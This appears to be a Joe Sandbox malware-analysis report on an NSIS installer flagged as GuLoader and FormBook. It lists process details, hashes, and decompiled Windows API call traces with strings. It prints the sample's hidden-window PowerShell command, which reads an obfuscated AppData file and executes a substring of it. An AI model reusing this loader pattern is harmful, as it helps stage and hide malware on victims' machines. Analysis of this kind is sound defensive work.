Commandline:	powershell.exe -windowstyle hidden "$Flerpartisystemernes=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\hobbyprget.Lic';$Medregnendes=$Flerpartisystemernes.SubString(72468,3);.$Medregnendes($Flerpartisystemernes) "
Imagebase:	0x590000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1916889305.000000000B79C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	22:59:43
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	00:53:14
Start date:	11/01/2025
Path:	C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\Bldtvandsfiltrene166.exe"
Imagebase:	0x400000
File size:	720'350 bytes
MD5 hash:	C759322828B728B406066F7D04170334
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2276925695.0000000020DE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 55%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	22.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.5%
Total number of Nodes:	1350
Total number of Limit Nodes:	30

Executed Functions

Function 00403532 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 464
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00403555
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
#17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
OleInitialize.OLE32(00000000), ref: 00403670
SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 0040368F
GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
CharNextW.USER32(00000000,"C:\Users\user\Desktop\iwEnYIOol8.exe",00000020,"C:\Users\user\Desktop\iwEnYIOol8.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036DD
GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403832
GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040384E
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\iwEnYIOol8.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

wsprintfW.USER32 ref: 004039B1
GetFileAttributesW.KERNEL32( mil.ia",C:\Users\user~1\AppData\Local\Temp\), ref: 004039E4
DeleteFileW.KERNEL32( mil.ia"), ref: 004039F0
SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\), ref: 00403A1E

Part of subcall function 00406317: MoveFileExW.KERNEL32(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321

CopyFileW.KERNEL32(C:\Users\user\Desktop\iwEnYIOol8.exe, mil.ia",00000001,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00403A34

Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?, mil.ia",?), ref: 00405B63
Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?, mil.ia",?), ref: 00405B70

Part of subcall function 004068B4: FindFirstFileW.KERNELBASE(771B3420,0042FAB8,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,00405F77,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C83,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 004068BF
Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB

OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
ExitProcess.KERNEL32 ref: 00403A9F
CloseHandle.KERNEL32(00000000,00438000,00438000,?, mil.ia",00000000), ref: 00403AA6
GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADE
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
ExitWindowsEx.USER32(00000002,80040002), ref: 00403B26
ExitProcess.KERNEL32 ref: 00403B49

Part of subcall function 00405B05: CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B

Strings

1033, xrefs: 00403876
C:\Users\user\Desktop, xrefs: 00403972
"C:\Users\user\Desktop\iwEnYIOol8.exe", xrefs: 004036AA, 004036B0, 004036C5, 004038A3
C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040380A, 0040380F, 00403825, 00403831, 00403840, 0040384D, 00403859, 00403861, 0040394F, 004039D0, 004039FC, 00403A1D, 00403A26
TEMP, xrefs: 0040385A
\Temp, xrefs: 0040382C
~nsu%X.tmp, xrefs: 004039A8
UXTHEME, xrefs: 00403620, 00403625, 0040362B
SeShutdownPrivilege, xrefs: 00403AD8
C:\Users\user\Desktop\iwEnYIOol8.exe, xrefs: 00403A2F
Low, xrefs: 00403848
C:\Users\user\AppData\Roaming\erstatningsgraden, xrefs: 004037FA, 0040391C, 00403969, 00403977
TMP, xrefs: 00403862
mil.ia", xrefs: 00403994, 004039C5, 004039E3, 004039EF, 00403A2E, 00403A40, 00403A6D
Error launching installer, xrefs: 004038FD
NSIS Error, xrefs: 00403695
C:\Users\user\AppData\Roaming\erstatningsgraden\Starlettens, xrefs: 00403927

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
String ID: mil.ia"$"C:\Users\user\Desktop\iwEnYIOol8.exe"$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\erstatningsgraden$C:\Users\user\AppData\Roaming\erstatningsgraden\Starlettens$C:\Users\user\Desktop$C:\Users\user\Desktop\iwEnYIOol8.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
API String ID: 1813718867-2506231036
Opcode ID: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
Instruction ID: 6c1349364f4d22fadfcc29bbd5f82b0434b4f5ba6e08f6571c64e8404a3f48da
Opcode Fuzzy Hash: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
Instruction Fuzzy Hash: 64F10270604301ABD320AF659D45B2B7AE8EF8570AF10483EF581B22D1DB7DDA45CB6E

Function 0040571B Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405779
GetDlgItem.USER32(?,000003EE), ref: 00405788
GetClientRect.USER32(?,?), ref: 004057C5
GetSystemMetrics.USER32(00000002), ref: 004057CC
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057ED
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FE
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405811
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581F
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405832
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405854
ShowWindow.USER32(?,00000008), ref: 00405868
GetDlgItem.USER32(?,000003EC), ref: 00405889
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405899
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058B2
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BE
GetDlgItem.USER32(?,000003F8), ref: 00405797

Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519

GetDlgItem.USER32(?,000003EC), ref: 004058DB
CreateThread.KERNELBASE(00000000,00000000,Function_000056AF,00000000), ref: 004058E9
CloseHandle.KERNELBASE(00000000), ref: 004058F0
ShowWindow.USER32(00000000), ref: 00405914
ShowWindow.USER32(?,00000008), ref: 00405919
ShowWindow.USER32(00000008), ref: 00405963
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405997
CreatePopupMenu.USER32 ref: 004059A8
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059BC
GetWindowRect.USER32(?,?), ref: 004059DC
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F5
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2D
OpenClipboard.USER32(00000000), ref: 00405A3D
EmptyClipboard.USER32 ref: 00405A43
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4F
GlobalLock.KERNEL32(00000000), ref: 00405A59
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6D
GlobalUnlock.KERNEL32(00000000), ref: 00405A8D
SetClipboardData.USER32(0000000D,00000000), ref: 00405A98
CloseClipboard.USER32 ref: 00405A9E

Strings

{, xrefs: 00405981

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
Instruction ID: 234ab3d0ec1f6487b719ed7b99e1d6b4405f443d9e8d78e252fa94ab3ac4d3a1
Opcode Fuzzy Hash: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
Instruction Fuzzy Hash: 34B139B1900608FFDB11AF60DD89AAE7B79FB48355F00813AFA41BA1A0C7785A51DF58

Function 00405C63 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\iwEnYIOol8.exe"), ref: 00405C8C
lstrcatW.KERNEL32(0042EA70,\*.*,0042EA70,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\iwEnYIOol8.exe"), ref: 00405CD4
lstrcatW.KERNEL32(?,0040A014,?,0042EA70,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\iwEnYIOol8.exe"), ref: 00405CF7
lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\iwEnYIOol8.exe"), ref: 00405CFD
FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\iwEnYIOol8.exe"), ref: 00405D0D
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
FindClose.KERNEL32(00000000), ref: 00405DBC

Strings

\*.*, xrefs: 00405CCE
"C:\Users\user\Desktop\iwEnYIOol8.exe", xrefs: 00405C6C
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405C70
pB, xrefs: 00405CBC

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\iwEnYIOol8.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*$pB
API String ID: 2035342205-138677063
Opcode ID: bc80552e2adf98b6cbbc0c73f9d9449be503fe2b945a8ee0ce3316eb6b08af02
Instruction ID: 3df5019795aaf58f6817f8e3609a5bcb0d9fa216103f8ca083ea3247371bac5c
Opcode Fuzzy Hash: bc80552e2adf98b6cbbc0c73f9d9449be503fe2b945a8ee0ce3316eb6b08af02
Instruction Fuzzy Hash: 2441B231400A14BADB21BB65DC8DAAF7678EF81714F24813BF801B11D1DB7C4A81DEAE

Function 004068B4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(771B3420,0042FAB8,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,00405F77,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C83,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 004068BF
FindClose.KERNEL32(00000000), ref: 004068CB

Strings

C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp, xrefs: 004068B4

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user~1\AppData\Local\Temp\nsjDF7A.tmp
API String ID: 2295610775-22591298
Opcode ID: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
Instruction ID: 0f602bcf77736d61886636fd33b874369bd8b56ce32760b4adaf045605f9a717
Opcode Fuzzy Hash: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
Instruction Fuzzy Hash: 24D012725161309BC2406738AD0C84B7B58AF15331751CA37F56BF21E0D7348C6387A9

Function 00403FD7 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404013
ShowWindow.USER32(?), ref: 00404033
GetWindowLongW.USER32(?,000000F0), ref: 00404045
ShowWindow.USER32(?,00000004), ref: 0040405E
DestroyWindow.USER32 ref: 00404072
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040408B
GetDlgItem.USER32(?,?), ref: 004040AA
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BE
IsWindowEnabled.USER32(00000000), ref: 004040C5
GetDlgItem.USER32(?,00000001), ref: 00404170
GetDlgItem.USER32(?,00000002), ref: 0040417A
SetClassLongW.USER32(?,000000F2,?), ref: 00404194
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E5
GetDlgItem.USER32(?,00000003), ref: 0040428B
ShowWindow.USER32(00000000,?), ref: 004042AC
KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042BE
EnableWindow.USER32(?,?), ref: 004042D9
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EF
EnableMenuItem.USER32(00000000), ref: 004042F6
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430E
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404321
lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040434B
SetWindowTextW.USER32(?,0042CA68), ref: 0040435F
ShowWindow.USER32(?,0000000A), ref: 00404493

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 121052019-0
Opcode ID: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
Instruction ID: 911e0a6aef898d83942fe666095560f38e6effa11f08765efd6836b1f10f2e9c
Opcode Fuzzy Hash: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
Instruction Fuzzy Hash: 29C1B0B1500204BBDB206F61EE89A2B3A68FB85756F01053EF781B51F0CB3958929B2D

Function 00403C29 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978

lstrcatW.KERNEL32(1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\iwEnYIOol8.exe",00008001), ref: 00403CAA
lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\erstatningsgraden,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,771B3420), ref: 00403D2A
lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\erstatningsgraden,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
GetFileAttributesW.KERNEL32(: Completed), ref: 00403D48
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\erstatningsgraden), ref: 00403D91

Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB

RegisterClassW.USER32(004336A0), ref: 00403DCE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
ShowWindow.USER32(00000005,00000000), ref: 00403E51
GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E7D
GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
RegisterClassW.USER32(004336A0), ref: 00403E93
DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2

Strings

1033, xrefs: 00403C49, 00403CA5
"C:\Users\user\Desktop\iwEnYIOol8.exe", xrefs: 00403C2C
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403C2E
.exe, xrefs: 00403D37
RichEd20, xrefs: 00403E57
Control Panel\Desktop\ResourceLocale, xrefs: 00403C5D
: Completed, xrefs: 00403CF1, 00403CFA, 00403D08, 00403D57, 00403D5D
C:\Users\user\AppData\Roaming\erstatningsgraden, xrefs: 00403CB9, 00403CC1, 00403D64, 00403D6A, 00403D7A
RichEdit20W, xrefs: 00403E75, 00403E7B
_Nb, xrefs: 00403DAD, 00403E15
RichEdit, xrefs: 00403E84
RichEd32, xrefs: 00403E65
.DEFAULT\Control Panel\International, xrefs: 00403C95

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\iwEnYIOol8.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\erstatningsgraden$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-270865079
Opcode ID: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
Instruction ID: b78af383561608ccb802af496d710159af2d94eef556b4765221653e5b422f1b
